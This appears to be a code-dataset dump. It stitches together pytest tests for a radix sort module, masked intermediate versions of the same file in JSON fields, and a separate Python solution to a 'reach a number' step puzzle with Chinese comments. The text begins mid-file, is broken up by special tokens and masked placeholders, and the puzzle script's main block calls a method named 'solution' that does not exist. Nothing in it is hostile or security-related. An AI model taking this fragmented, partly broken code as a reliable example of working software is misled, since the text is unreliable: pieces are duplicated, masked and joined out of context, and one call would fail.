def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
def test_radix_sort():
"""Test with simple list."""
from radixsort import radixsort
nums = [5, 3, 2, 7, 9, 4, 0, 1]
assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
"""Test radix sort."""
import random
from collections import OrderedDict
from que_ import Queue
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({
'none': Queue(),
'0': Queue(),
'1': Queue(),
'2': Queue(),
'3': Queue(),
'4': Queue(),
'5': Queue(),
'6': Queue(),
'7': Queue(),
'8': Queue(),
'9': Queue(),
})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({
'none': Queue(),
'0': Queue(),
'1': Queue(),
'2': Queue(),
'3': Queue(),
'4': Queue(),
'5': Queue(),
'6': Queue(),
'7': Queue(),
'8': Queue(),
'9': Queue(),
})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
def test_radix_sort():
"""Test with simple list."""
from radixsort import radixsort
nums = [5, 3, 2, 7, 9, 4, 0, 1]
assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
# test on 100 lists
for i in range(100):
# generate random length of list
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
# generate random numbers for random length list
unsorted_list.append(random.randint(0, 100))
# test that list is sorted
assert radixsort(unsorted_list) == sorted(unsorted_list)
|
flexible
|
{
"blob_id": "fd907dbcea01679c08aeae6bcbf6e61786f40260",
"index": 2511,
"step-1": "<mask token>\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\n<mask token>\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\n<mask token>\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-2": "<mask token>\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\n<mask token>\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-3": "<mask token>\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\ndef test_radix_sort():\n \"\"\"Test with simple list.\"\"\"\n from radixsort import radixsort\n nums = [5, 3, 2, 7, 9, 4, 0, 1]\n assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-4": "<mask token>\nimport random\nfrom collections import OrderedDict\nfrom que_ import Queue\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\ndef test_radix_sort():\n \"\"\"Test with simple list.\"\"\"\n from radixsort import radixsort\n nums = [5, 3, 2, 7, 9, 4, 0, 1]\n assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-5": "\"\"\"Test radix sort.\"\"\"\n\nimport random\nfrom collections import OrderedDict\nfrom que_ import Queue\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({\n 'none': Queue(),\n '0': Queue(),\n '1': Queue(),\n '2': Queue(),\n '3': Queue(),\n '4': Queue(),\n '5': Queue(),\n '6': Queue(),\n '7': Queue(),\n '8': Queue(),\n '9': Queue(),\n })\n\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n\n buckets_dict = OrderedDict({\n 'none': Queue(),\n '0': Queue(),\n '1': Queue(),\n '2': Queue(),\n '3': Queue(),\n '4': Queue(),\n '5': Queue(),\n '6': Queue(),\n '7': Queue(),\n '8': Queue(),\n '9': Queue(),\n })\n\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\ndef test_radix_sort():\n \"\"\"Test with simple list.\"\"\"\n from radixsort import radixsort\n nums = [5, 3, 2, 7, 9, 4, 0, 1]\n assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n # test on 100 lists\n for i in range(100):\n # generate random length of list\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n # generate random numbers for random length list\n unsorted_list.append(random.randint(0, 100))\n\n # test that list is sorted\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def reachNumber(self, target):
target = abs(target)
k = 0
while target > 0:
k += 1
target -= k
return k if target % 2 == 0 else k + 1 + k % 2
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def reachNumber(self, target):
target = abs(target)
k = 0
while target > 0:
k += 1
target -= k
return k if target % 2 == 0 else k + 1 + k % 2
if __name__ == '__main__':
s = input()
s1 = Solution()
print(s1.solution(s))
<|reserved_special_token_1|>
#到达终点的最小步数 leetcode原题 754 https://leetcode.com/problems/reach-a-number/solution/
# 分情况讨论:到target与到abs(target)的情况是一样的
# 1. total = 1+2+...+k,求total刚好大于等于n的k,可知到达target至少要用k步,此时超出d=total-k
# 2. 如果d为偶数,则只需将d/2步反向即可,k步即可到达target
# 3. 如果d为奇数,则k步不可能到达,因为任何反转都会改变偶数距离,不可能消去d,则再走一步判断d+k+1是否为偶数
# 4. 如果为偶数,说明k+1步可到
# 5. 如果d+k+1为奇数,且已知d为奇数,说明k+1为偶数,不可能在k+1步走到,再走一步,d+k+1+k+2必为偶数,k+2步可到
class Solution(object):
def reachNumber(self, target):
target = abs(target)
k = 0
while target > 0:
k += 1
target -= k
return k if target % 2 == 0 else k + 1 + k%2
if __name__ == '__main__':
s = input()
s1 = Solution()
print(s1.solution(s))
|
flexible
|
{
"blob_id": "4b255b648f67e6bcc30eecc7975bbb1a356b2499",
"index": 2656,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Solution(object):\n\n def reachNumber(self, target):\n target = abs(target)\n k = 0\n while target > 0:\n k += 1\n target -= k\n return k if target % 2 == 0 else k + 1 + k % 2\n\n\n<mask token>\n",
"step-4": "class Solution(object):\n\n def reachNumber(self, target):\n target = abs(target)\n k = 0\n while target > 0:\n k += 1\n target -= k\n return k if target % 2 == 0 else k + 1 + k % 2\n\n\nif __name__ == '__main__':\n s = input()\n s1 = Solution()\n print(s1.solution(s))\n",
"step-5": "#到达终点的最小步数 leetcode原题 754 https://leetcode.com/problems/reach-a-number/solution/\n# 分情况讨论:到target与到abs(target)的情况是一样的\n# 1. total = 1+2+...+k,求total刚好大于等于n的k,可知到达target至少要用k步,此时超出d=total-k\n# 2. 如果d为偶数,则只需将d/2步反向即可,k步即可到达target\n# 3. 如果d为奇数,则k步不可能到达,因为任何反转都会改变偶数距离,不可能消去d,则再走一步判断d+k+1是否为偶数\n# 4. 如果为偶数,说明k+1步可到\n# 5. 如果d+k+1为奇数,且已知d为奇数,说明k+1为偶数,不可能在k+1步走到,再走一步,d+k+1+k+2必为偶数,k+2步可到\n\nclass Solution(object):\n def reachNumber(self, target):\n target = abs(target)\n k = 0\n while target > 0:\n k += 1\n target -= k\n\n return k if target % 2 == 0 else k + 1 + k%2\n\nif __name__ == '__main__':\n s = input()\n s1 = Solution()\n print(s1.solution(s))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.